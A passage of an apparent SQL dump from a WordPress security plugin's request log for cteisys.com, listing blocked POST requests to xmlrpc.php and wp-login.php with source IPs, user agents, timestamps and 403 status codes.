Firefox\\/52.0\"}','L6YIekK9svOZ08tnqNC2SMoa',0,1665711703.5911,498,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','ltEMgzykZxFn8qi5OvC2r6AI',0,1665711692.6206,459,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','iQGlCBR8dKavcE7w2XtWrLOm',0,1665711688.9755,487,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','c0mFJnh9MKSOENYdxuZD871k',0,1665711686.8566,521,'','POST',403,0,515,0,1,'',0),('82.165.86.64',1386567232,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','NxKcSsr9La1OAPleWfgIE6Jb',0,1665711654.8583,15554,'','POST',403,0,515,0,1,'',0),('167.99.119.158',2808313758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','em9HgxCOkpnBiAV3uSNUYf4y',0,1665711664.6371,5843,'','POST',403,0,515,0,1,'',0),('185.107.112.221',3110826205,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xGTy3s2X9wBdUceRkHKglPoF',0,1665708571.7174,520,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','0vkxcXpGQh2nzS3M8CK1aTqI',0,1665708568.2263,580,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','yFX5YS6gd7MBqZG2wsD3nWTh',0,1665708557.7312,772,'','POST',403,0,515,0,1,'',0),('134.209.222.89',2261900889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','6QWtskzHuVKNDTbywo4UqO7a',0,1665708555.6911,2210,'','POST',403,0,515,0,1,'',0),('104.255.174.93',1761586781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','LDyM7jz5SErlOkUxVaZp8ewN',0,1665708545.2380,506,'','POST',403,0,515,0,1,'',0),('194.59.164.178',3258688690,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','w0VAvOp4o7BQXfjMHk56cbsS',0,1665708541.6455,691,'','POST',403,0,515,0,1,'',0),('103.155.93.241',1738235377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','UaOfbSG0w1QyoIY49l3djHqT',0,1665708533.5763,1610,'','POST',403,0,515,0,1,'',0),('67.225.140.132',1138855044,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','GsiFIOa26bMlRfnLJHgAvKEt',0,1665708534.9024,704,'','POST',403,0,515,0,1,'',0),('104.255.174.93',1761586781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','iyLGBgJ1lAtPVbzUEN9dcmkS',0,1665708508.6971,15692,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','gacnreqCzhOLU2Pw7f1dI3mb',0,1665708505.5706,18786,'','POST',403,0,515,0,1,'',0),('67.227.144.244',1138987252,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','dU37ueQ90ywZtJFlDqSpkbCs',0,1665708511.7501,12602,'','POST',403,0,515,0,1,'',0),('141.98.102.179',2372036275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','D0fcAyMIEzG3OnlvWp4eTNsF',0,1665708113.6747,2607,'','POST',403,0,515,0,1,'',0),('85.128.143.151',1434488727,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','WGpZYOJa0lzB1c4fdvkqNbFw',0,1665706553.1902,15640,'','POST',403,0,515,0,1,'',0),('165.22.69.253',2769700349,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','dbaRcx2XWnFpqmzlisHLP1Iu',0,1665706549.6133,19217,'','POST',403,0,515,0,1,'',0),('13.78.225.32',223273248,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','D5RMNXuIq91H0tUl7hPFLnwc',0,1665705511.3575,1503,'','POST',403,0,600,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','aDBeQjJVOWvisU2knI83t7fd',0,1665704611.7326,17855,'','POST',403,0,600,0,1,'',0),('142.132.134.40',2391049768,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','hrtD7HQezB5IR4TqaZ3A8o9j',0,1665704120.4476,516,'','POST',403,0,515,0,1,'',0),('135.181.119.15',2276816655,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','u2x0wsagYkfmFBoVHdb4hR87',0,1665704128.8869,491,'','POST',403,0,515,0,1,'',0),('34.237.52.22',585970710,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','KtdGBR96a35S82AMhcmYwz4p',0,1665704109.7818,1544,'','POST',403,0,515,0,1,'',0),('67.225.140.8',1138854920,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','aCP3GQoV4YBsXtvdA2gpnEWq',0,1665704107.9618,588,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','cKL86r0sFDYHnE2OWkepUzPm',0,1665704096.0907,509,'','POST',403,0,515,0,1,'',0),('34.66.113.129',574779777,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','c5HQJADwuO7feYKhX4lWr1LE',0,1665704086.2882,1842,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','4N5JqimlbOt7uahX301WSUVI',0,1665704095.2791,519,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','HlTOFbxsE4LnzSIjC3Mp9ZtJ',0,1665704086.9021,1022,'','POST',403,0,515,0,1,'',0),('216.158.228.157',3634291869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','SNVA6cHh4rJpvqTYgwnFxDs2',0,1665704062.6942,13517,'','POST',403,0,515,0,1,'',0),('148.66.128.80',2487386192,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','GlgZtSCYfrd0MVqWbwAuLT7F',0,1665704085.2796,509,'','POST',403,0,515,0,1,'',0),('67.222.142.146',1138658962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','R8IWNsOypkSwgYrGjKVX3M2l',0,1665704057.3159,18895,'','POST',403,0,515,0,1,'',0),('54.37.156.240',908434672,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','jCO6HWVMfmEoABeUhZIb10yw',0,1665703014.1626,17384,'','POST',403,0,600,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','f5r4MvOjd0lSNgF9JH1hPopY',0,1665707933.3566,17705,'','POST',403,0,600,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','70HFoJGrUIpYlREc8iAZBMfg',0,1665707208.1790,1209,'','POST',403,0,515,0,1,'',0),('51.75.130.25',860586521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','nOWskmQrPadohqejS5D7bYfx',0,1665707221.4550,564,'','POST',403,0,515,0,1,'',0),('82.165.86.64',1386567232,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','E5lUw8SPxTiMOcIedXzt91hf',0,1665707199.2984,1014,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','grP4bzaOY7NxCh8udk5jqlWD',0,1665707199.1845,1035,'','POST',403,0,515,0,1,'',0),('161.97.90.217',2707512025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','OxwQ6MJqUzGLAacKXtNn198P',0,1665707194.2135,478,'','POST',403,0,515,0,1,'',0),('18.162.51.22',312619798,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','d6SBJXnMNjG2m1kt4xITVDzA',0,1665707192.4764,492,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','IwjUFD84aPKgdluo6Z1eVvBW',0,1665707177.8733,657,'','POST',403,0,515,0,1,'',0),('52.26.178.66',874164802,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','onq3NteQHShIY78AxikuF0d1',0,1665707173.3054,1061,'','POST',403,0,515,0,1,'',0),('208.88.73.86',3495446870,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','Qg8uTp6x5AqPfNlaLUdt34sR',0,1665707167.0550,2358,'','POST',403,0,515,0,1,'',0),('198.38.88.243',3324401907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','NgTVOodU4Z8uXecjzwL5vJIF',0,1665707173.2017,1014,'','POST',403,0,515,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','gxDILUy5s02W1jbRevuiMpqh',0,1665707037.0732,1325,'','POST',403,0,600,0,1,'',0),('205.185.121.252',3451484668,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','Faxuo9XvzVtYZ3P6l4d0pDQg',0,1665706810.7882,6558,'','POST',403,0,600,0,1,'',0),('45.136.107.178',763915186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','fUOJd4YQgBExyvoKmr0lZ2HV',0,1665706612.4990,574,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','CKzW4cNw5UFnxR9Ba0rP6TqS',0,1665706607.5138,1187,'','POST',403,0,515,0,1,'',0),('67.225.140.132',1138855044,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','n9c5K7oRgBIP8VsCtZrmpidT',0,1665706601.4837,531,'','POST',403,0,515,0,1,'',0),('67.205.176.79',1137553487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','HQiYCtfT4XjhOAzkNynExlsG',0,1665706595.4557,493,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Yr1o9ZBGODIsQw0pEcLTmgkK',0,1665706591.2802,500,'','POST',403,0,515,0,1,'',0),('120.27.18.147',2015040147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','G8sWjFqbHKvJY4TRX5QhdBpn',0,1665706585.7729,551,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','26VZHiDhcy4dm1bA9MeS5KNu',0,1665706572.3687,1545,'','POST',403,0,515,0,1,'',0),('159.89.202.42',2673461802,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','SPNJBtjCAvo5W1XLgdHGl3r7',0,1665706576.0828,507,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','qUtGYHEAWRkjFrXod48i2nK9',0,1665711652.3437,18069,'','POST',403,0,515,0,1,'',0),('194.36.111.59',3257167675,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uk2w69gcKLYBCzrTm5WXSGla',0,1665711150.8639,1605,'','POST',403,0,515,0,1,'',0),('194.36.111.59',3257167675,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','yoMa4smfR19zVSw7nT5ghYpb',0,1665711077.5334,19582,'','POST',403,0,515,0,1,'',0),('109.168.97.89',1839751513,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','yCdaU1Oec7whTXljIrsN0LBp',0,1665710368.6262,18081,'','POST',403,0,600,0,1,'',0),('213.152.161.35',3583549731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JLTk1IC6ouyVcehtS5pNOr7G',0,1665709929.1921,18968,'','POST',403,0,515,0,1,'',0),('121.243.95.160',2045992864,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','ujxKWrSC2nkFgDbV5UJlHQya',0,1665709463.0806,17959,'','POST',403,0,600,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','NYReEO3pJqloVBIxWjnLT74F',0,1665713727.9355,596,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','VcrAWmTBOC6h51iZPkNexDtu',0,1665713723.3456,579,'','POST',403,0,515,0,1,'',0),('23.235.194.70',401326662,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','uxlMOo2knaShFbIHBzg5W4eG',0,1665713712.1112,932,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','y1cSsuVHbkxCtFg49GIAZU7T',0,1665713711.7084,1111,'','POST',403,0,515,0,1,'',0),('139.59.127.114',2335932274,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','MQklOp7KDn68SPBfIe0XG3Rq',0,1665713706.5019,882,'','POST',403,0,515,0,1,'',0),('217.148.136.176',3650390192,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','zmPDpg4WUBYeGKxldCuQFq98',0,1665713698.6257,580,'','POST',403,0,515,0,1,'',0),('132.148.106.163',2224319139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','Mdm7B9R5GCgyJUzsST4AQODa',0,1665713695.0870,966,'','POST',403,0,515,0,1,'',0),('139.59.127.114',2335932274,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','0MYwjZAOU1HisLaKfnXBxtN4',0,1665713693.9734,1606,'','POST',403,0,515,0,1,'',0),('185.30.32.94',3105759326,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VuZItBSf9nL4NUdET7xzheMK',0,1665713683.5798,515,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','MPExDIhiCXwetf3K8BUpA7g6',0,1665713682.2992,482,'','POST',403,0,515,0,1,'',0),('194.163.163.7',3265504007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','Afkb8TPgSyDeoXEH0Qu4LsMB',0,1665713661.3923,16010,'','POST',403,0,515,0,1,'',0),('111.229.251.165',1877343141,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','iRuFXcGpQ875O2JxwZaTDe6v',0,1665713659.4604,17948,'','POST',403,0,515,0,1,'',0),('103.110.86.9',1735284233,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','eBNzv0CgVSLPEiYoG523hMqb',0,1665713665.3672,11898,'','POST',403,0,515,0,1,'',0),('208.113.180.18',3497112594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','JvwacTsMNRKyIQ6quVlhg58b',0,1665712801.8090,17212,'','POST',403,0,600,0,1,'',0),('59.106.13.177',996806065,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','pxscVIPCLBAH17j2GRzgu8oE',0,1665716863.4497,560,'','POST',403,0,515,0,1,'',0),('193.70.114.151',3242619543,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','zZWPwHoOygAD12lhpfaKxtn6',0,1665716854.0094,481,'','POST',403,0,515,0,1,'',0),('148.72.232.160',2487806112,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','LDXYcI2qZTOz4GJHj56fEKui',0,1665716852.2950,548,'','POST',403,0,515,0,1,'',0),('92.205.1.224',1556939232,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','DXMKekNu4GJLx82bPvfZ6zUq',0,1665716848.9648,470,'','POST',403,0,515,0,1,'',0),('42.193.106.55',717318711,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','QGO72HNYSWn3LxbocTq4BKX1',0,1665716845.8742,513,'','POST',403,0,515,0,1,'',0),('35.202.60.49',600456241,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','Z1ahNQ0IWYGVU4dFk7ou6tzP',0,1665716842.7281,476,'','POST',403,0,515,0,1,'',0),('194.163.163.7',3265504007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','gHr5EtSTPyKCd6ha4jnlDqxk',0,1665716838.3129,2590,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','LMinxeU4XbBFQVjJzADq0KWy',0,1665716839.2162,2116,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','RTiQUXw3kSBmdjaPLbuO7E5M',0,1665722057.0976,829,'','POST',403,0,515,0,1,'',0),('185.107.112.221',3110826205,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','aWu6oT9Xsyqngvmeb2ML0NjK',0,1665722037.3689,1242,'','POST',403,0,515,0,1,'',0),('136.144.251.177',2291202993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','WAnQIETdiqgC81NMPrYDtK6F',0,1665722042.6228,525,'','POST',403,0,515,0,1,'',0),('104.152.110.183',1754820279,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 